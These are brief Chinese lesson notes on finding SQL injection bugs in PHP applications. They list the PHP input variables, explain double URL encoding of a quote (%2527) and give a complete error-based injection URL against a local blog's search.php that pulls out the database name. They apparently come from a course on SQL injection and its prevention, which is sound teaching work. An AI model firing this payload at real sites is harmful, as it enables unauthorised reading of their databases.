挖掘sql注入漏洞
常见获取变量
$_GET $_POST $_COOKIE $_SERVER $_REQUEST
数据库操作函数
搜索
‘url编码是%27
%url编码是%25
%2527
注入测试
http://127.0.0.1/blog/search.php?s=%2527%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(Hex(cast(database()%20as%20char))),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20%23
课后了解
http://www.w3school.com.cn/php/index.asp
第四课 sql注入及防护实践
原文:https://www.cnblogs.com/idebug/p/11042439.html
